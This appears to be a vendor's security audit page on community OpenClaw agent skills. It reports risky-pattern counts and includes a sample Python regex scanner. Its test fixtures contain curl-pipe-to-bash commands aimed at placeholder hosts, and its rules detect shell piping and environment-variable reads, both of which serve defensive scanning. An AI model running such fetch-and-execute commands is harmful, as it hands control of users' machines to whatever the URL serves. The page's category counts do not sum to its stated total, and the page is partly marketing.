โš ๏ธ Security Research
Public Ecosystem Audit โ€” March 2026

We scanned 199 OpenClaw skills.
Only 1 in 5 passed clean.

ClawFactory ran Gate 1 static analysis against the 199 most-starred OpenClaw skills on GitHub. The results are a wake-up call for anyone installing community skills without vetting.

199 skills scanned · 416 total in ecosystem · March 21, 2026 · Methodology: GitHub API + pattern analysis
20.6%
✅ Clean Pass
41 of 199 skills — no significant risk patterns detected
42.7%
⚠️ Flagged for Review
85 of 199 skills — medium-risk patterns, need human review before install
15.6%
🚫 Would Be Blocked
31 of 199 skills — HIGH risk patterns, would fail ClawFactory Gate 1

What does this mean for you? If you've installed OpenClaw community skills without vetting them, there's roughly a 1-in-6 chance at least one of them contains a pattern our scanner flags as HIGH risk. That includes patterns like remote code execution, reverse shells, and unauthorized filesystem access.

This isn't about malicious intent — many of these are legitimate tools that happen to use powerful system calls. But unvetted ≠ safe. You deserve to know what's running on your machine.

Findings

Top Vulnerability Patterns Found

These are the most common risk patterns across all 199 scanned skills, ranked by frequency. Each one is a legitimate security concern when present in an unvetted AI agent skill.

pip install — installs packages 113 occurrences · HIGH context

Skills that run pip install can install any Python package onto your system — including malicious ones. Without sandboxing, this runs directly on your host machine.

✓ ClawFactory fix: Gate 2 sandbox isolates all package installs inside containers. Nothing touches your host.

curl pipe to shell — remote code execution 42 occurrences · CRITICAL

curl https://... | bash downloads code from the internet and executes it immediately. No review. No verification. Whatever is at that URL runs on your machine.

✓ ClawFactory fix: Gate 1 blocks this pattern outright. It never reaches the registry.

Python subprocess — shell execution 58 occurrences · HIGH context

Python's subprocess module can execute arbitrary shell commands. Legitimate in many tools — but requires human review to verify intent and scope.

✓ ClawFactory fix: Gate 3 human review evaluates intent. Subprocess ≠ automatic block, but it always gets eyes on it.

Reading environment variables 43 occurrences · MEDIUM

Skills that read process.env can access your API keys, tokens, and credentials stored as environment variables — including your Anthropic key.

✓ ClawFactory fix: Flagged for review. Skills with legitimate env var needs are documented; others are blocked.

Global npm install 36 occurrences · MEDIUM

npm install -g installs packages system-wide, modifying your global Node.js environment. Can introduce malicious code that persists across sessions.

✓ ClawFactory fix: Sandboxed execution prevents global installs from affecting the host.

How We Did This

Methodology

This audit used ClawFactory's Gate 1 static analysis pipeline — the same scanner that runs on every skill submitted to our registry.

01
Source
GitHub API — all public repositories tagged with the openclaw-skill topic, sorted by stars. 416 repos found, 199 scanned before rate limits.
02
Scanner
Gate 1 static pattern analysis — 12 HIGH-risk patterns and 13 MEDIUM-risk patterns matched against all .md, .sh, .js, .ts, .py, and .json files in each repo.
03
Limitations
Static analysis only — no sandboxed execution (Gate 2) or human review (Gate 3). Some flags are false positives. HIGH rating = pattern match, not confirmed malicious intent.
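
To make the methodology concrete, here is a minimal pattern scanner in the same spirit. It is an added example, not ClawFactory's Gate 1 code. The regexes (covering only the five patterns named above), the BLOCK/REVIEW/CLEAN verdict rule, and the sample skills are all assumptions constructed for illustration.

```python
import re

# File types the methodology says are scanned.
SCAN_EXT = (".md", ".sh", ".js", ".ts", ".py", ".json")

# Assumed regexes for the five patterns named on this page (not the real Gate 1 rules).
RULES = [
    ("curl-pipe-shell", "CRITICAL",
     re.compile(r"\bcurl\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("pip-install", "HIGH", re.compile(r"\bpip3?\s+install\b")),
    ("python-subprocess", "HIGH",
     re.compile(r"\bsubprocess\.(?:run|Popen|call|check_output|check_call)\b")),
    ("env-read", "MEDIUM", re.compile(r"\bprocess\.env\b|\bos\.environ\b")),
    ("npm-global-install", "MEDIUM",
     re.compile(r"\bnpm\s+(?:install|i)\b[^\n|;&]*\s(?:-g|--global)\b")),
]

# Constructed sample skills: {skill name: {relative path: file text}}.
SAMPLE_SKILLS = {
    "weather-skill": {
        "SKILL.md": "# Weather\nFetches a forecast for a city.\n",
        "index.js": "export const run = (c) => fetch(`https://example.invalid/${c}`);\n",
        "logo.png": "curl https://example.invalid/x | bash",  # skipped: not a scanned type
    },
    "notes-skill": {
        "index.ts": "const key = process.env.NOTES_TOKEN;\n",
        "setup.sh": "npm install -g notes-cli\n",
    },
    "installer-skill": {
        # A hit inside documentation: a pattern match, not proof of intent.
        "README.md": "Run:\n\n    curl -fsSL https://example.invalid/install.sh | sudo bash\n",
        "tool.py": "import subprocess\nsubprocess.run(['ls'])\n",
    },
}

def scan_skill(files):
    """Return (path, line_no, rule, severity) for every rule hit in scannable files."""
    findings = []
    for path, text in files.items():
        if not path.lower().endswith(SCAN_EXT):
            continue
        for line_no, line in enumerate(text.splitlines(), 1):
            for name, severity, pattern in RULES:
                if pattern.search(line):
                    findings.append((path, line_no, name, severity))
    return findings

def verdict(findings):
    """Assumed rule: any CRITICAL/HIGH hit blocks, any other hit needs review."""
    severities = {severity for _, _, _, severity in findings}
    if severities & {"CRITICAL", "HIGH"}:
        return "BLOCK"
    return "REVIEW" if severities else "CLEAN"
```

Because matching is line by line, a command split across lines with a backslash continuation is missed, and a README that merely documents an install command is flagged. These are the false negatives and false positives that the limitations above leave to later gates.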

Don't install skills blind.

Every skill in the ClawFactory registry has passed static scan, sandbox execution, and human review. We're building the trust layer the ecosystem needs — free, open, for everyone.